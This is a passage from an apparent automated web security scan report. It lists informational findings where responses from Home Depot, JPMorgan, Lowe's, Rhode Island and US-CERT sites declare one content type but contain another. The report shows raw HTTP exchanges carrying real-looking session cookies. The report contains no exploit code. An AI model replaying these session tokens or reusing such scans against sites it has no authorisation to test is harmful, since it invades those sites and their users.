Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; Coradiantuserid=82f95932-9eee-1ce7-9678-00e0ed0ed026; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0245525d5f4f58455e445a4a422991; THD_SESSION=C6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1%3A%3BC34%3D1.0-2.1-3.0-4.0-5.0%3A%3BC34_EXP%3D-1; FSRCookie=ForeseeLoyalty=1; VISITORID=910187893; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita76%2fWC%5fTHD%5fccaita76%2f1310489037105%3a%3bC25%5fEXP%3d1362329037%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; WCSSESSIONID=0000QiM4nuQJ3aVixF3NjrJw_1o:1146agca4; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eNone%5f%7eC26%5fEXP%7e; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=JMxYfo5MdQHKu9q8vDJ%2brG6L1y0%3d%0a%3b2011%2d07%2d12+12%3a43%3a57%2e331%5f1308225529140%2d4164%5f10051%5f295945051%2c%2d1%2cUSD%5f10051; WC_ACTIVESTOREDATA=%2d1%2c10051; WC_USERSESSION_295945051=295945051%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%7cnull%7c%2d2000%5d%2c3BGt1536l7E8DMQ2tmDGwVwz0tc%3d; s_pers=%20s_campaign%3Dno%2520value%7C1310490838387%3B%20s_prevPage%3Dmostpopular%7C1310490838390%3B%20p_30%3DCategory%7C1310490838393%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B; RES_SESSIONID=877035136567428; ResonanceSegment=1

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PM10658 Apache/2.0.47 (Unix)
Last-Modified: Wed, 19 May 2010 16:11:09 GMT
ETag: "17b807-2d-b4b8e140"
Accept-Ranges: bytes
Content-Length: 45
Content-Type: image/png
Cache-Control: max-age=5040
Date: Tue, 12 Jul 2011 16:44:01 GMT
Connection: close

GIF89a........x....!.......,............. ..;

27.23. http://www.homedepot.com/wcsstore/hdus/en_US/styles/businessjs.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/wcsstore/hdus/en_US/styles/businessjs.json

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /wcsstore/hdus/en_US/styles/businessjs.json HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=JOV9mEDH97qHDqOENJ2a%2foByFXM%3d%0a%3b2011%2d06%2d16+08%3a16%3a48%2e923%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; ResonanceSegment=1; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita7t%2fWC%5fTHD2%5fccaita7t%2f1310488436587%3a%3bC25%5fEXP%3d1362328436%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; THD_CACHE_NAV_SESSION=C20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e; Coradiantuserid=82f95932-9eee-1ce7-9678-00e0ed0ed026; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0245525d5f4f58455e445a4a422991

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Last-Modified: Tue, 26 Apr 2011 04:10:40 GMT
ETag: "fefe4-6083-81ccf000"
Accept-Ranges: bytes
Content-Type: text/plain
Vary: Accept-Encoding
Content-Length: 24707
Cache-Control: max-age=5567
Date: Tue, 12 Jul 2011 16:35:27 GMT
Connection: close

/* Last updated 3:59m 04/21/2011 Aundrae Brown */

var fed_ipadurl = document.location.href;

// John Jimenez
// A simple flag to tell if we are in IE6
isIE6 = (jQuery.browser.msie && jQuery.b
...[SNIP]...

27.24. http://www.jpmorgan.com/cm/BlobServer previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.jpmorgan.com
Path:	/cm/BlobServer

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

Response

27.25. http://www.jpmorgan.com/cm/Satellite previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.jpmorgan.com
Path:	/cm/Satellite

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /cm/Satellite?c=CSElement&cid=1159296966913&pagename=Global_Javascript HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:16 GMT
Server: Apache
host_service: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: text/html; charset=UTF-8
Content-Length: 3246

/* Function to swap input fields in client login box */
function checkSelected()
{
   if (document.myForm.selection.value == "page1") {
       if (document.getElementById("loginIntroText"))

...[SNIP]...

27.26. http://www.jpmorgan.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.jpmorgan.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

Response

27.27. http://www.lowes.com/campaign/summer/2011/images/homepage/20110622_area5_background.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.lowes.com
Path:	/campaign/summer/2011/images/homepage/20110622_area5_background.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /campaign/summer/2011/images/homepage/20110622_area5_background.jpg HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmSessionDepth=1; cmTPSet=Y; lowes-prefs={"zipin":{"show":false}}; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; stop_mobi=yes; JSESSIONID=0000PEQyadqdrfGWIRAteqY0oby:14e1grfqa; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; TSdcd8fd=9bfed736835c96972761a89519e0d94422df7bb2eaf0e7a04e1cbbb4

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 20 Jun 2011 21:26:58 GMT
Accept-Ranges: bytes
Content-Length: 2522
Content-Type: image/jpeg
Expires: Tue, 12 Jul 2011 21:30:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:59 GMT
Connection: close

.PNG
.
...IHDR.......?.......&.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

27.28. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/Mexico/js/ContenidoMenu.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/Mexico/js/ContenidoMenu.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/Mexico/js/ContenidoMenu.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.lowes.com
Cookie: MBJT=3npJGdCEGA39cXndCp1mhBo99ohPFg9QUCqlPZDTH03dVbJkclo_8Rw; akaau=1310508130~id=1c4ed4773ab2b33abb47cb68f3f868cd

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 17 Mar 2010 18:41:45 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
X-Pad: avoid browser bug
Content-Length: 2531
Expires: Tue, 12 Jul 2011 21:32:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:32:32 GMT
Connection: close
Vary: Accept-Encoding

stm_bm ( ["",830,"","",0,"","",0,0,100,100,400,1,0,0,"","",0,0,1,2,"default","hand",""],this);
stm_bp("p0",[0,4,0,0,0,0,0,0,100,"",-2,"",-2,10,0,0,"#999999","transparent","",3,0,0,"#000000"]);
stm_ai(
...[SNIP]...

27.29. https://www.lowes.com/MContent/Structured/MastheadArea/help_center/my_profile.html previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.lowes.com
Path:	/MContent/Structured/MastheadArea/help_center/my_profile.html

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

27.30. http://www.mass.gov/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.mass.gov
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=ISO-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.mass.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=255208596.1490703165.1310517570.1310517570.1310517570.1; __utmb=255208596.1.10.1310517570; __utmc=255208596; __utmz=255208596.1310517570.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.a=1310517572572

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:39:34 GMT
Server: Apache/2.0.46 (Red Hat)
Last-Modified: Wed, 22 Sep 2004 13:17:17 GMT
ETag: "e6146a-57e-909fd140"
Accept-Ranges: bytes
Content-Length: 1406
Cache-Control: max-age=300
Expires: Wed, 13 Jul 2011 00:44:34 GMT
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

..............h.......(....... ...........@............................|...........................|.........................................................................y.........................
...[SNIP]...

27.31. http://www.popcap.com/js/s_code.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.popcap.com
Path:	/js/s_code.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

27.32. http://www.readability.com/embed.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.readability.com
Path:	/embed.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

27.33. http://www.res-x.com/ws/r2/Resonance.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.res-x.com
Path:	/ws/r2/Resonance.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /ws/r2/Resonance.aspx?appid=HOMEDEPOT01&tk=345519762253388&ss=877035136567428&sg=1&pg=800586763303726&bx=true&vr=2.69&sc=search_rr&cu=287408220&ct=&no=3&cb=r1eh&clk=&ur=http%3A//www.homedepot.com/webapp/wcs/stores/servlet/Search%3Fkeyword%3Dxss%26selectedCatgry%3DSEARCH+ALL%26langId%3D-1%26storeId%3D10051%26catalogId%3D10053&plk=202349120;202571062;202349118;202571024;202571026;202571029;202571027;202571025;202571023;202571028;202349088;202349089;202349087;100661424;&rf=http%3A//www.homedepot.com/ HTTP/1.1
Host: www.res-x.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/Search?keyword=xss&selectedCatgry=SEARCH+ALL&langId=-1&storeId=10051&catalogId=10053
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=r3vcat55x0xldvufmhh0m545; NSC_wjq-ipnfefqpu=ffffffffc3a01e5745525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR CUR PSA PSD OUR IND UNI"
Date: Tue, 12 Jul 2011 16:44:01 GMT
Content-Length: 3254

r1eh({"Resonance":{"Response":[{"scheme":"search_rr","display":"yes","output":"<div id=\"accessories\"><div id=\"add-ons\" class=\"col\"><div id=\"ymal_vert\"><div class=\"rounded-top-gray\"></div><h4
...[SNIP]...

27.34. http://www.ri.gov/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.ri.gov
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.ri.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52; font_level=0; __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.9.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:39:58 GMT
Server: www
Last-Modified: Tue, 05 May 2009 14:56:26 GMT
ETag: "43a-4692b7ba89a80"
Accept-Ranges: bytes
Content-Length: 1082
Content-Type: text/plain

............ .$.......(............. ..................................l...l...l...l.@.................................................l...l...l...l...l...l...l. .l.P.l...l.p.l.0.....................l
...[SNIP]...

27.35. http://www.ri.gov/img/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.ri.gov
Path:	/img/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /img/favicon.ico HTTP/1.1
Host: www.ri.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.1.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; font_level=0

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:31:58 GMT
Server: www
Last-Modified: Fri, 17 Apr 2009 20:47:13 GMT
ETag: "43a-467c649039640"
Accept-Ranges: bytes
Content-Length: 1082
Content-Type: text/plain

............ .$.......(............. ..................................l...l...l...l.@.................................................l...l...l...l...l...l...l. .l.P.l...l.p.l.0.....................l
...[SNIP]...

27.36. http://www.ri.gov/img/governmentbox/seal.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.ri.gov
Path:	/img/governmentbox/seal.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /img/governmentbox/seal.gif HTTP/1.1
Host: www.ri.gov
Proxy-Connection: keep-alive
Referer: http://www.ri.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52; __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.8.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; font_level=0

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:35:31 GMT
Server: www
Last-Modified: Mon, 09 May 2011 19:42:55 GMT
ETag: "d61-4a2dd0bb92dc0"
Accept-Ranges: bytes
Content-Length: 3425
Content-Type: image/gif

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

..........................................................................................................p....
...[SNIP]...

27.37. http://www.ri.gov/type/junction_02-webfont.woff previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.ri.gov
Path:	/type/junction_02-webfont.woff

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /type/junction_02-webfont.woff HTTP/1.1
Host: www.ri.gov
Proxy-Connection: keep-alive
Referer: http://www.ri.gov/press/view/14202
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.1.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:31:49 GMT
Server: www
Last-Modified: Thu, 14 Apr 2011 19:29:38 GMT
ETag: "64ec-4a0e5f22f8c80"
Accept-Ranges: bytes
Content-Length: 25836
Content-Type: text/plain

wOFF......d........x........................FFTM............[.. GDEF.......#...&....GPOS...........JD.?(GSUB....... ... l.t.OS/2.......I...`.d..cmap...T.......
....cvt .......F...F...1fpgm...D.......e
...[SNIP]...

27.38. https://www.ri.gov/img/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.ri.gov
Path:	/img/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

Response

27.39. https://www.ri.gov/type/junction_02-webfont.woff previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.ri.gov
Path:	/type/junction_02-webfont.woff

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

Response

27.40. http://www.riema.ri.gov/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.riema.ri.gov
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=iso-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.riema.ri.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:31:38 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 14 Aug 2009 18:30:02 GMT
ETag: "9b00ff-37e-3d861e80"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain; charset=iso-8859-1

..............h.......(....... ..........................................g........................z..p.......G.B,q..]............blvsy.............\.8|.....f..d_}..r..(D\u|sT^`.'G./Jz|spvn>\kk..2|.
...[SNIP]...

27.41. http://www.us-cert.gov/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.us-cert.gov
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.us-cert.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=38495399.2128222210.1310517609.1310517609.1310517609.1; __utmb=38495399.1.10.1310517609; __utmc=38495399; __utmz=38495399.1310517609.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:40:16 GMT
Server: Apache
Last-Modified: Thu, 09 Jun 2005 16:43:35 GMT
ETag: "58024-57e-c1269bc0"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...........@.............................h.....F>7.....w`@.....-...mhe.UPO.....................C.......|wv.hO5..iU........./''.....l\U.YB3......rg.> ..830...y.dTH.......
...[SNIP]...

27.42. http://www6.homedepot.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www6.homedepot.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
Host: www6.homedepot.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
